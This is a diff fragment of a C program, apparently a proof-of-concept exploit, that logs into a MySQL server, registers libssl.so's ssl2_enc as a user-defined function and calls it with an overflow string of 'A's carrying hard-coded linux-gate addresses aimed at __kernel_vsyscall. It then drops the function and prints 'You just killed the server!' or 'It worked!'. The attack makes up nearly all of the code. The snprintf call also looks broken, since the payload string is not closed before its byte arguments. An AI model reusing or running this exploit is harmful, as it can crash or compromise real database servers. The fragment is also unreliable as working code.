@@ -, +, @@ 
 * gcc -Wall -I /usr/include/mysql -L /usr/lib/mysql -lmysqlclient \
 * -o mysql_udf mysql_udf.c
 *
 * Dou to the use of linux-gate, this example will only work on linux. 
 *
 */
    MYSQL mysql;
    char sql[1024];
    int len;
    if(!mysql_init(&mysql)) {
        return -1;
    }
    mysql_options(&mysql, MYSQL_SET_CHARSET_NAME, "utf8");
    if(!mysql_real_connect(
        &mysql, MY_HOST, MY_USER, MY_PASS, NULL, 0, NULL, 0)
    ) {
        fprintf(stderr, "%s\n", mysql_error(&mysql));
        exit(EXIT_FAILURE);
    }
    len = snprintf(sql, sizeof(sql),
        "create function ssl2_enc returns integer soname 'libssl.so'"
    );
    if(mysql_real_query(&mysql, sql, len) < 0) {
        fprintf(stderr, "%s\n", mysql_error(&mysql));
        exit(EXIT_FAILURE);
    }
    len = snprintf(sql, sizeof(sql),
        "select ssl2_enc(\""
        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
        "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA"
        0xff, 0xe0, 0xff, 0xff, // any pointer with whatever value is OK.
        0x3c, 0xe0, 0xff, 0xff, // call addr + 0x18
        // 0xffffe03c + 0x18 -> 0xffffe400 -> __kernel_vsyscall
        0x09, 0xe1, 0xff, 0xff // addr - 0xac
    );
    mysql_real_query(&mysql, sql, len);
    len = snprintf(sql, sizeof(sql), "drop function ssl2_enc");
    if(mysql_real_query(&mysql, sql, len) < 0) {
        fprintf(stderr, "You just killed the server!\n");
        exit(EXIT_FAILURE);
    }
    printf("It worked!\n");
    exit(EXIT_SUCCESS);